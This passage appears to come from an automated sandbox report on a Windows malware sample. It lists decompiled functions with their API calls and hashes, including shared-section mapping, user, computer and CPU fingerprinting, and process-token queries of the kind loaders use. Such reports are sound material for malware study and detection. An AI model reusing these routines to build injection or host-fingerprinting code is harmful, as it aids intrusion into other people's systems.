                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ab5b9d610631981cba52ba69541954e5ddb4dd1ef057235120fe3222887fc19
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED817075D00219AFDF29DFA8DC44AEEBBB9FF49300F100165E625E6250D7349AA5CFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                                                          			E004010FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                          				struct _FILETIME* _v16;
                                                                                                                                                                                                                                          				short _v60;
                                                                                                                                                                                                                                          				struct _FILETIME* _t14;
                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                          				long _t18;
                                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                          				long _t32;
                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t31 = __edx;
                                                                                                                                                                                                                                          				_t14 =  &_v16;
                                                                                                                                                                                                                                          				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                          				_push(0x192);
                                                                                                                                                                                                                                          				_push(0x54d38000);
                                                                                                                                                                                                                                          				_push(_v12);
                                                                                                                                                                                                                                          				_push(_v16);
                                                                                                                                                                                                                                          				L00402180();
                                                                                                                                                                                                                                          				_push(_t14);
                                                                                                                                                                                                                                          				_v16 = _t14;
                                                                                                                                                                                                                                          				_t15 =  *0x404144;
                                                                                                                                                                                                                                          				_push(_t15 + 0x40505e);
                                                                                                                                                                                                                                          				_push(_t15 + 0x405054);
                                                                                                                                                                                                                                          				_push(0x16);
                                                                                                                                                                                                                                          				_push( &_v60);
                                                                                                                                                                                                                                          				_v12 = _t31;
                                                                                                                                                                                                                                          				L0040217A();
                                                                                                                                                                                                                                          				_t18 = _a4;
                                                                                                                                                                                                                                          				if(_t18 == 0) {
                                                                                                                                                                                                                                          					_t18 = 0x1000;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t19 = CreateFileMappingW(0xffffffff, 0x404148, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                          				_t34 = _t19;
                                                                                                                                                                                                                                          				if(_t34 == 0) {
                                                                                                                                                                                                                                          					_t32 = GetLastError();
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                          						if(_t22 == 0) {
                                                                                                                                                                                                                                          							_t32 = GetLastError();
                                                                                                                                                                                                                                          							if(_t32 != 0) {
                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							 *_a8 = _t34;
                                                                                                                                                                                                                                          							 *_a12 = _t22;
                                                                                                                                                                                                                                          							_t32 = 0;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t32 = 2;
                                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                                          						CloseHandle(_t34);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t32;
                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                          0x004010fc
                                                                                                                                                                                                                                          0x00401105
                                                                                                                                                                                                                                          0x00401109
                                                                                                                                                                                                                                          0x0040110f
                                                                                                                                                                                                                                          0x00401114
                                                                                                                                                                                                                                          0x00401119
                                                                                                                                                                                                                                          0x0040111c
                                                                                                                                                                                                                                          0x0040111f
                                                                                                                                                                                                                                          0x00401124
                                                                                                                                                                                                                                          0x00401125
                                                                                                                                                                                                                                          0x00401128
                                                                                                                                                                                                                                          0x00401133
                                                                                                                                                                                                                                          0x0040113a
                                                                                                                                                                                                                                          0x0040113e
                                                                                                                                                                                                                                          0x00401140
                                                                                                                                                                                                                                          0x00401141
                                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                                          0x00401149
                                                                                                                                                                                                                                          0x00401153
                                                                                                                                                                                                                                          0x00401155
                                                                                                                                                                                                                                          0x00401155
                                                                                                                                                                                                                                          0x00401169
                                                                                                                                                                                                                                          0x0040116f
                                                                                                                                                                                                                                          0x00401173
                                                                                                                                                                                                                                          0x004011c3
                                                                                                                                                                                                                                          0x00401175
                                                                                                                                                                                                                                          0x0040117e
                                                                                                                                                                                                                                          0x00401194
                                                                                                                                                                                                                                          0x0040119c
                                                                                                                                                                                                                                          0x004011ae
                                                                                                                                                                                                                                          0x004011b2
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040119e
                                                                                                                                                                                                                                          0x004011a1
                                                                                                                                                                                                                                          0x004011a6
                                                                                                                                                                                                                                          0x004011a8
                                                                                                                                                                                                                                          0x004011a8
                                                                                                                                                                                                                                          0x00401189
                                                                                                                                                                                                                                          0x0040118b
                                                                                                                                                                                                                                          0x004011b4
                                                                                                                                                                                                                                          0x004011b5
                                                                                                                                                                                                                                          0x004011b5
                                                                                                                                                                                                                                          0x0040117e
                                                                                                                                                                                                                                          0x004011cb

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401109
                                                                                                                                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0040111F
                                                                                                                                                                                                                                          • _snwprintf.NTDLL ref: 00401144
                                                                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(000000FF,00404148,00000004,00000000,?,?), ref: 00401169
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401180
                                                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401194
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004011AC
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004011B5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004011BD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1724014008-0
                                                                                                                                                                                                                                          • Opcode ID: 10781628c56b613e53fd0cec9fa96b362338ff09033fe3b660c77061631cefb2
                                                                                                                                                                                                                                          • Instruction ID: ef5076f750e2cd4e4e98990b3d3664116a4674d5ffa79623b8c505300cb00d24
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10781628c56b613e53fd0cec9fa96b362338ff09033fe3b660c77061631cefb2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C2198B2600108BFD714AF94DC84E9E3BADEB88355F104136FB15FB2E0D6745D458B69
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                          			E011293D5(char __eax, void* __esi) {
                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                          				long _t34;
                                                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                                                          				long _t50;
                                                                                                                                                                                                                                          				char _t59;
                                                                                                                                                                                                                                          				intOrPtr _t61;
                                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                                                          				char _t65;
                                                                                                                                                                                                                                          				intOrPtr* _t67;
                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t69 = __esi;
                                                                                                                                                                                                                                          				_t65 = __eax;
                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                          				_v12 = __eax;
                                                                                                                                                                                                                                          				if(__eax == 0) {
                                                                                                                                                                                                                                          					_t59 =  *0x112d270; // 0xd448b889
                                                                                                                                                                                                                                          					_v12 = _t59;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t64 = _t69;
                                                                                                                                                                                                                                          				E01126F89( &_v12, _t64);
                                                                                                                                                                                                                                          				if(_t65 != 0) {
                                                                                                                                                                                                                                          					 *_t69 =  *_t69 ^  *0x112d2a0 ^ 0x76f6612d;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                          					_t50 = _v8;
                                                                                                                                                                                                                                          					if(_t50 != 0) {
                                                                                                                                                                                                                                          						_t62 = RtlAllocateHeap( *0x112d238, 0, _t50 + _t50);
                                                                                                                                                                                                                                          						if(_t62 != 0) {
                                                                                                                                                                                                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                          								_t64 = _t62;
                                                                                                                                                                                                                                          								 *_t69 =  *_t69 ^ E01127CF7(_v8 + _v8, _t64);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							HeapFree( *0x112d238, 0, _t62);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t61 = __imp__;
                                                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                          				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                          				_t34 = _v8;
                                                                                                                                                                                                                                          				if(_t34 != 0) {
                                                                                                                                                                                                                                          					_t68 = RtlAllocateHeap( *0x112d238, 0, _t34 + _t34);
                                                                                                                                                                                                                                          					if(_t68 != 0) {
                                                                                                                                                                                                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                          							_t64 = _t68;
                                                                                                                                                                                                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E01127CF7(_v8 + _v8, _t64);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						HeapFree( *0x112d238, 0, _t68);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				asm("cpuid");
                                                                                                                                                                                                                                          				_t67 =  &_v28;
                                                                                                                                                                                                                                          				 *_t67 = 1;
                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                                                                                                                          				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                                                                                                                          				return _t39;
                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                          0x011293d5
                                                                                                                                                                                                                                          0x011293dd
                                                                                                                                                                                                                                          0x011293e1
                                                                                                                                                                                                                                          0x011293e4
                                                                                                                                                                                                                                          0x011293e9
                                                                                                                                                                                                                                          0x011293eb
                                                                                                                                                                                                                                          0x011293f0
                                                                                                                                                                                                                                          0x011293f0
                                                                                                                                                                                                                                          0x011293f6
                                                                                                                                                                                                                                          0x011293f8
                                                                                                                                                                                                                                          0x01129405
                                                                                                                                                                                                                                          0x01129466
                                                                                                                                                                                                                                          0x01129407
                                                                                                                                                                                                                                          0x0112940c
                                                                                                                                                                                                                                          0x01129412
                                                                                                                                                                                                                                          0x01129417
                                                                                                                                                                                                                                          0x01129425
                                                                                                                                                                                                                                          0x01129429
                                                                                                                                                                                                                                          0x01129438
                                                                                                                                                                                                                                          0x0112943f
                                                                                                                                                                                                                                          0x01129446
                                                                                                                                                                                                                                          0x01129446
                                                                                                                                                                                                                                          0x01129451
                                                                                                                                                                                                                                          0x01129451
                                                                                                                                                                                                                                          0x01129429
                                                                                                                                                                                                                                          0x01129417
                                                                                                                                                                                                                                          0x01129468
                                                                                                                                                                                                                                          0x0112946e
                                                                                                                                                                                                                                          0x01129478
                                                                                                                                                                                                                                          0x0112947a
                                                                                                                                                                                                                                          0x0112947f
                                                                                                                                                                                                                                          0x0112948e
                                                                                                                                                                                                                                          0x01129492
                                                                                                                                                                                                                                          0x0112949d
                                                                                                                                                                                                                                          0x011294a4
                                                                                                                                                                                                                                          0x011294ab
                                                                                                                                                                                                                                          0x011294ab
                                                                                                                                                                                                                                          0x011294b7
                                                                                                                                                                                                                                          0x011294b7
                                                                                                                                                                                                                                          0x01129492
                                                                                                                                                                                                                                          0x011294c2
                                                                                                                                                                                                                                          0x011294c4
                                                                                                                                                                                                                                          0x011294c7
                                                                                                                                                                                                                                          0x011294c9
                                                                                                                                                                                                                                          0x011294cc
                                                                                                                                                                                                                                          0x011294cf
                                                                                                                                                                                                                                          0x011294d9
                                                                                                                                                                                                                                          0x011294dd
                                                                                                                                                                                                                                          0x011294e1

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0112940C
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 01129423
                                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 01129430
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01129451
                                                                                                                                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01129478
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0112948C
                                                                                                                                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01129499
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 011294B7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3239747167-0
                                                                                                                                                                                                                                          • Opcode ID: 61591884a8d281fb6ec18f17d2cba60df1e6728c937329e202dcdfe1af01eabe
                                                                                                                                                                                                                                          • Instruction ID: 9e557b9e9599916e28df3db3fe2ad1fc9f797cba18e92553753390119dd49ce9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61591884a8d281fb6ec18f17d2cba60df1e6728c937329e202dcdfe1af01eabe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78315CB1A00219EFDB28DFADDD80A6EBBF9FF44214F514079E514D3210EB34DA618B50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                                                          			E011271B9(char _a4, void* _a8) {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                                                          				void** _t33;
                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                                                          				void** _t44;
                                                                                                                                                                                                                                          				intOrPtr* _t47;
                                                                                                                                                                                                                                          				char _t48;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				_v20 = _a4;
                                                                                                                                                                                                                                          				_t48 = 0;
                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                          				_a4 = 0;
                                                                                                                                                                                                                                          				_v44 = 0x18;
                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                          					_t33 =  &_v8;
                                                                                                                                                                                                                                          					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                          					if(_t33 >= 0) {
                                                                                                                                                                                                                                          						_t47 = __imp__;
                                                                                                                                                                                                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                          						_t44 = E011258BE(_a4);
                                                                                                                                                                                                                                          						if(_t44 != 0) {
                                                                                                                                                                                                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                          							if(_t40 >= 0) {
                                                                                                                                                                                                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                          								_t48 = 1;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							E0112147E(_t44);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						NtClose(_v8); // executed
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					NtClose(_v12);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t48;
                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                          0x011271c6
                                                                                                                                                                                                                                          0x011271c7
                                                                                                                                                                                                                                          0x011271c8
                                                                                                                                                                                                                                          0x011271c9
                                                                                                                                                                                                                                          0x011271ca
                                                                                                                                                                                                                                          0x011271ce
                                                                                                                                                                                                                                          0x011271d5
                                                                                                                                                                                                                                          0x011271e4
                                                                                                                                                                                                                                          0x011271e7
                                                                                                                                                                                                                                          0x011271ea
                                                                                                                                                                                                                                          0x011271f1
                                                                                                                                                                                                                                          0x011271f4
                                                                                                                                                                                                                                          0x011271f7
                                                                                                                                                                                                                                          0x011271fa
                                                                                                                                                                                                                                          0x011271fd
                                                                                                                                                                                                                                          0x01127208
                                                                                                                                                                                                                                          0x0112720a
                                                                                                                                                                                                                                          0x01127213
                                                                                                                                                                                                                                          0x0112721b
                                                                                                                                                                                                                                          0x0112721d
                                                                                                                                                                                                                                          0x0112722f
                                                                                                                                                                                                                                          0x01127239
                                                                                                                                                                                                                                          0x0112723d
                                                                                                                                                                                                                                          0x0112724c
                                                                                                                                                                                                                                          0x01127250
                                                                                                                                                                                                                                          0x01127259
                                                                                                                                                                                                                                          0x01127261
                                                                                                                                                                                                                                          0x01127261
                                                                                                                                                                                                                                          0x01127263
                                                                                                                                                                                                                                          0x01127263
                                                                                                                                                                                                                                          0x0112726b
                                                                                                                                                                                                                                          0x01127271
                                                                                                                                                                                                                                          0x01127275
                                                                                                                                                                                                                                          0x01127275
                                                                                                                                                                                                                                          0x01127280

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01127200
                                                                                                                                                                                                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 01127213
                                                                                                                                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0112722F
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0112724C
                                                                                                                                                                                                                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 01127259
                                                                                                                                                                                                                                          • NtClose.NTDLL(?), ref: 0112726B
                                                                                                                                                                                                                                          • NtClose.NTDLL(00000000), ref: 01127275
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2575439697-0
                                                                                                                                                                                                                                          • Opcode ID: 7432c7c5a41f9b631546c1b62e7019254fd61a02f82133c7723d98eddfe4a7a0
                                                                                                                                                                                                                                          • Instruction ID: 0b75b8a1d0c8b09eaf6a393cbac2db527ef15668037b4856077ad4157615a44a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7432c7c5a41f9b631546c1b62e7019254fd61a02f82133c7723d98eddfe4a7a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A02105B2A00229FBDB159F95CC85ADEBFBDEF18740F104022FA00A6154D7718A649BE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                                                          			E00401A34(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				long _t34;
                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                                                          				intOrPtr* _t48;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t48 = __eax;
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                          				_v48 = 0x18;
                                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                                          				_v36 = 0x40;
                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                          				if(_t34 < 0) {
                                                                                                                                                                                                                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					 *_t48 = _v16;
                                                                                                                                                                                                                                          					_t39 = E004010BA(_t48,  &_v12); // executed
                                                                                                                                                                                                                                          					_t47 = _t39;
                                                                                                                                                                                                                                          					if(_t47 != 0) {
                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                          						 *_a4 = _v12;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t47;
                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                          0x00401a3d
                                                                                                                                                                                                                                          0x00401a44
                                                                                                                                                                                                                                          0x00401a45
                                                                                                                                                                                                                                          0x00401a46
                                                                                                                                                                                                                                          0x00401a47
                                                                                                                                                                                                                                          0x00401a48
                                                                                                                                                                                                                                          0x00401a59
                                                                                                                                                                                                                                          0x00401a5d
                                                                                                                                                                                                                                          0x00401a71
                                                                                                                                                                                                                                          0x00401a74
                                                                                                                                                                                                                                          0x00401a77
                                                                                                                                                                                                                                          0x00401a7e
                                                                                                                                                                                                                                          0x00401a81
                                                                                                                                                                                                                                          0x00401a88
                                                                                                                                                                                                                                          0x00401a8b
                                                                                                                                                                                                                                          0x00401a8e
                                                                                                                                                                                                                                          0x00401a91
                                                                                                                                                                                                                                          0x00401a96
                                                                                                                                                                                                                                          0x00401ad1
                                                                                                                                                                                                                                          0x00401a98
                                                                                                                                                                                                                                          0x00401a9b
                                                                                                                                                                                                                                          0x00401aa1
                                                                                                                                                                                                                                          0x00401aa6
                                                                                                                                                                                                                                          0x00401aaa
                                                                                                                                                                                                                                          0x00401ac8
                                                                                                                                                                                                                                          0x00401aac
                                                                                                                                                                                                                                          0x00401ab3
                                                                                                                                                                                                                                          0x00401ac1
                                                                                                                                                                                                                                          0x00401ac1
                                                                                                                                                                                                                                          0x00401aaa
                                                                                                                                                                                                                                          0x00401ad9

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401A91
                                                                                                                                                                                                                                            • Part of subcall function 004010BA: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 004010E7
                                                                                                                                                                                                                                          • memset.NTDLL ref: 00401AB3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                          • Opcode ID: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                                                                                                                                                                                                                          • Instruction ID: 471401f0b8c6b4b7cc2e8332a800b59de25362df95d7a1f7f52e8276a5367227
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2721F9B1E00209AFCB11DFA9C8849DEFBB9EF48354F10443AE616F3250D735AA458FA5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                          			E004010BA(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                          				long _t13;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                          				if(_t13 < 0) {
                                                                                                                                                                                                                                          					_push(_t13);
                                                                                                                                                                                                                                          					return __esi[6]();
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                          0x004010cc
                                                                                                                                                                                                                                          0x004010d2
                                                                                                                                                                                                                                          0x004010e0
                                                                                                                                                                                                                                          0x004010e7
                                                                                                                                                                                                                                          0x004010ec
